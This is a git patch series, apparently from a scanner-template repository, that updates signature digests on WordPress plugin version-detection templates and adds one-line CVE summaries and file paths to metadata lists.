a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022021a75005159393cf7541206dbffa4b78cd4eb2fff4fecaa958e8c44a39131085022072f2c43d4b0bde547eca40dc813eda79e01c2f78e94115bc5a7e6a77c89e887b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c565ea11ef627c188f3052a23ad68b1eb7eb0b983e3da6aca552290f2ce9acf022035812919c518ee7ad0cb903b040a6a440713d2bbc6a4c3ae29b14ba5f775c978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 7c1172a93d..4c6f344e9c 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022033e74fcbeddb157f3fc8d5b20c57b0028e985b1e47510825e19d626795747899022100bbf5715b4e58f83af8e417be09a018dff1bb56023e454e4a6af9dfd201314f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fd51e196ef5b2a8854a5c7a0bf7a9f1407710e80ec149dae0e3c9f819537a4102207b42748f513457aa879ad4cb19db045790fe3552373202137e3970600ec8421b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4929d1a352..c210531685 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220115c0a651b4b609494e8cfb958e52b22fb111c8615fca309d8196c4fe423a5b10220603faf10c961ff5360bb7ea1b4dbe6e1c3374d69f5839ad098607f78ea029968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022044a4a32afe555db7ea9a2b5212b52c1f5f0db66060a404a53d4527a3cfa3eb52022100ba24e9da4eafd075a90a0cd7a92fc48885d9bf5d2f1e7132c21031913c5dc123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 6db7bb8a26..d5de7a7110 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f53641b0b609f68f3466c77a805853acbd863dd98671f584e9ebb9e7a2055925022100c028674bad3ba9d5ecb9ba5c7779e409f81b18cf6a17925ca1b2ff7d64ea629a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a68d22859fbbd928717d9fd3a619ccedfe2b7ac80ef0db240e80b851a4c84c402201cd6acee49f4b33409c9b2decc6a27774681c8ae3b84df3a51f2f19922ac492d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 701800a13b..6ef2d1b4c9 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c6de9fa165287c475bf64a3a3182f1cf49b5db97560456ce79fd149c0df82d2602203fe77d65caeda756bdc82d34a5c5f943cc92b7abf5334fb64f7e49d9e145b8db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022042a7080cc64b9c9c5a305653baffedb29becb04e103d51ab53914c0a5efeef940221009e967fbde025bc896283ff10f472314ad73ed1531b019a36a84514fc78e0e013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 44d136542a..56dbe080e9 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204e3d3cf0e6774b96c795a7db628a621e4d733cda08340000a189c0be4a73cf3902210097ef5d7a9ef38469504fd853f63eb0639382ecbd6cd1b9cf4f3e67ac5d710851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2c5c52f56e8aa0f89525d9eeca6220db13c18d5d29045bad088d6f9fe367fc702203bfb530fdcc103128523b7f3c5fedeb011c10a5f8c4fc0d7a1b352a2f4038801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 0904210c2f..675ae96da2 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207582fe63d5b70f8d6702ca1cbd0dd7d2bdcdd5118498bcf2d400682014236a2902206a5d67b426c35b83896bc7ba58b309861e821f09fa17a8d66f1d2a4fc1cbea1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038bfc2ca45605964959bbe6274e2cc2501a0472d098078b6703e8e17d8cdf96d022100ae008b2d5f66bda1640f25a4acf4c8943173afa532746609fa51248380d6007a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index ff9eb7c4c6..66001b02bf 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ec223bbfa067b330ec119bef1dee0c38ab691efd9ad63e9a8c27e0d03a04dc56022100b3bb8a361cfb0734e4c8b71dab55c52ee7da74ddfb03dd769309e24583eccfd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ad88e06500696f5510a3b196c22c146398171f82aaea88ae797b38fb682b3b4e022100ae5fa91d210543cd295bf3f1bcf2382b5f1e662113c4dc6d39e71155a4b6162f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 0048c0777f..df33078ded 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100be540b2e9bee15654ddcb1ec44e89ad750ff15741a1c8410a06a8d7f58dc3e5e022037f4398e08c50d0142559da1e44575f9f292eb3fbcb25581299610e08b95a7e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055a33491ae23fbe4c11b752798b47ba1606172474f2cd70eb449e823ee911736022100e1688790a1280292ad5199874e27e094a23ede628e5615ba75beedef7a8c7748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 71c5f51330..bde81574ad 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022039ad629e27d09ecc4c8131eed57d51f03316acfb3755cd076221baa4d5765f1002203b09394dbc4cf9914fb10ea2ac67e36c8c05ce94a04d59912fa3f214f17c75b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e97717655fba5ecdbd7505a56984dceeee6b9277831752826469c84df4a3bf3a022100b25cbbcb0f899497bab8f2c267927d9281f6f285dd1e79048ea0269b2d1aa1e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 6d67771f94..19a9112d60 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b4df076b70ef7fedb0803969427a32ece3596536555893aa5053b312a135eb4a022100f4d04ef930c9bc29cf194ae894d2639a47609eb763c675eac6abf444ef824f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5ddc1592d6ed1df8f8bc64825652cb77cb8d031c65d57d9aa1cd5427955a9e60221009cf7609c47e0e1058b6734000f54b1864eed497077fb4d24f841c63202e5e3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 3551f789ea..8f1164508c 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022040a34ec6ab97b7f0c1659ffaac28f0038af55d767601fca783adf5345fe18103022100c2daf2f5243bab925cc6066a97f9f8d72f1125d6a218651ddb66096dd812a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d93fcbe16b066a840bf87cfb777dd8604e1d95ae103a6c63eec2fe955b8b0bc3022100e8b9b5edc236b2441f9d05ded03e575330c9e2fa474dc4500d70d5a330f5ec50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index f8d601526c..35f7cbbaec 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008a325c0f6c9a3c32a34b9c6f9c5cc234e9c499432ff2449f50f14a518510820f022100a5bbd65ea971441b69e768fb0d08ce7566ba97c336e5d72d4039bccfd118bb83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207210d9e0393df70e4902ddf47f3e7773cef7577fe531f5b2271166c3a415549b0220255b418201eb0d10d20c09787c55ad36eb2ab42e6a41cdd17614bdacafff7073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 1130fb1bb2..cd34bba66d 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200cc328fa2f8e038d68c03aa5ed97762150204a5bb2eff46fc88eee8bc15d4c9e022057cb075d704e201fdb54cf8e6f8400c8616f242a18f097147ca1ee1480939a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220235034a8120d37fcd0bcaa1c221e2444ee5a9b771777accce134ba1a1a84f9a00220184fb7bff236a77c4de6c187a074819eae96a122114b6d930312e2e7bdd12a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index dc9017901b..43e45e1b6e 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c08a48c6bf29bd9dea1b53d3f4d364e686ff3e151bc1b7b964e21a501b7b982a022100d62609aa5229ea3401c0c54698d548df3280d56fc16e191b086b95ae2cfec138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c4ab05836abd96e1163120c35621ad4ded63eb547b275275785b708656c33e9022100967c219a0a19da0491dea3dbf36be942c4719fe0a4c24dc9af9cf103c45d2809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 555351f596..7e6edd2b9d 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ccf04d907ffcbf83ce872c55865ca0b7163ba4d6f8dced9442684676c880911902201073c0ab99773d8a6ee1325533e62d8d6aeb88381d262ff6612799dc611fcbd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e0267db91c896723ac4b449ee1203c65915acda40f06db4abb0588d0a1732ee022057047f5b332d912e4e0b482cf0a0e4aed14c87db94e78675ad4272e0e9e8b337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 7d2abb98d1..4eb61a88ec 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b027f2bd9feccd8df845f583df85af75d5e2c1f69a5f692929a0966f2e201e7b02206bb658a316dcb5ac0e644356b30a87dbf062779ac75847fa31c0065fd16edc9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae152b49f89b8dfbab55a9310f449f96986c8504623fe2339b1e8a27318a5b01022100be3c57ae3aa0fc0e14d9a6a11b32970df8426009672be13477ee699dd9fb1b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 94fffa4ff0..81c4eb649c 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022074e33659605fc17d5751d5f8b1f5e2ab1ac15913d15ed7395100ece4ee80ae80022100ac633732e8275eb0beadba6312da9f721400ad6015273b77a2172972b0c5602b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206aeace6b1234e9e11a1bfd05ce7e785870e499a698792a324c77871ed0f041c5022100afa2272dcf3a05b0c17b18af76b68750548156c170a0217bba1c2d2fae2f305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index e7b328aa6f..9be306d731 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022014be7884f9bc0e2e9be7178ea0081c04795aa2b4c26545ec61286ae21738e070022100b97467ab7c15fa2e3c07afd546d516e84244794216b350870ca8ad5224a10e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac97001f3dabdabfaab45bba38f0f52d7ca1ab1b435b669b3e9684df057a8592022100f369936d8f1f7a50105dfecf858541a9ef423cb57a0d65f77400493881b5f1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index f3f9206275..5e9fe7c431 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e18dddeab51f44660be47dc5dc67ae3c0954fa30541b59005b4b211d015442c2022100d52817a9228b9b732c0f18a480d0020632d383f161d6f354cf449a7bb6dc0293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5735c96d91cf99808747a55e11dc4e1d5976e898bc526cff6f67843b6aaff92022100cf96a434322bf472c8b650d08ad3b1f3faa57a9e30b91c95d6b8898e01596e2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 0dcb121ecc..c99966ab40 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022053ead60379435009f71c464f5d6ceb109ba2cb34989d9b76c51cbc5b1193b360022100ae2f149c4181a0b0a86e42985348555948b252d044538c4819570d0c0c6452f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ecc66735715bc8bc00e80560cd4e171ed651822daeb41ef762c313fa5d6ccbf02210080d646cc8c140c4054003a6e571a03145fc4b1c327c5918e1cb093f632628605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index a47728cf4c..2e80a25489 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f74ea8428feb6d16a1efc29bb08d3e98e8fdf7974863c6d2072bf99b8c5cfe4102204c9417ee708752a94f580072d035ffbd21032421f52365fe419cf71cf82a5008:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c67dd6e7b15bf295d315d9bcf51b3cd239c636143d9c2e8ff3c5869bd0ec5ca022100d772c6ec2bf7044e1fd3715596e127e1276b1865a833e11abf898b005232e3cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 761a3b3adc..7faccfdfb8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022075fc534c645ee4f887e8bd994c28afc9958835126a576c0e97bd5e33389d97bf02205eb2a37461c4be98a2bec77b57c20c1f7d3c18614af59b46dfc9721923a908ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0b75822136b2eff372528681158e7f1f80af9adb1bd4fc907c507f9ee4387cd022032cb0f49ebb1bca31af7ca910edc777e4f193d5ba42fb299d9469efa2433e8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 386d77be51..981002ee17 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204c0446deed8a7e7958ad61e9b105a5cda1be9ba320fe2279f66714859e4a54c8022100fb811dfdadcbab87ffba8493bd3ef5af90c3d02f831f551361b7877498f69f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203900d2922eff78ddb3d1ba776d2451f2280cab2ac4488b4442107c50b065df79022100917fd7371e65fc546ba58755c4c39cf297daaab5565fcfd556abf24b6e561b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ee8478c4ef..0e26f4b5e7 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200d66477a3f29569dfe2e7d6d2084440ade4b70a50133988bc6badfbf42a1fe1b0220173d91926138c152d5def8717c7b7765fa3d3e73f4790298d8036b545686cae7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a896044b723aedf8677c27488947ccf7cc4ff99d7780acea3cec70076e482eb022065c5b718a59a8b652e73005cd75f674e6ca06aa1ede5e280bbeb5077aa3479f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c80d5443e489198ddb083825f53f1daacd586153 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:51:47 +0000 Subject: [PATCH 169/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 5ad2b9fa9d..87efae5286 100644 --- a/cves.json +++ b/cves.json @@ -2541,6 +2541,7 @@ {"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"} {"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"} {"ID":"CVE-2024-32738","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32738.yaml"} +{"ID":"CVE-2024-32739","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32739.yaml"} {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} {"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"} {"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"} @@ -2614,6 +2615,7 @@ {"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"} {"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"} {"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"} +{"ID":"CVE-2024-45488","Info":{"Name":"SafeGuard for Privileged Passwords \u003c 7.5.2 - Authentication Bypass","Severity":"critical","Description":"One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45488.yaml"} {"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"} {"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a600afe706..b442dace3c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -df9be3b3a1bd2d6a09caf1e6e91b079a +e2c650aa2b533a247598fb920bd38734 From 554a303196bdf0a8fe15fd9fea2b9c2656d1a7a8 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:51:50 +0000 Subject: [PATCH 170/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 73a908155e..999c6c771c 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/cves/2024/CVE-2024-32735.yaml http/cves/2024/CVE-2024-32736.yaml http/cves/2024/CVE-2024-32737.yaml http/cves/2024/CVE-2024-32738.yaml +http/cves/2024/CVE-2024-32739.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 95244fd1f6f75691fdc5f1f9d2c1140d89ee7394 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:51:53 +0000 Subject: [PATCH 171/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 411 +++++++++++++++++++++-------------------- 1 file changed, 206 insertions(+), 205 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt 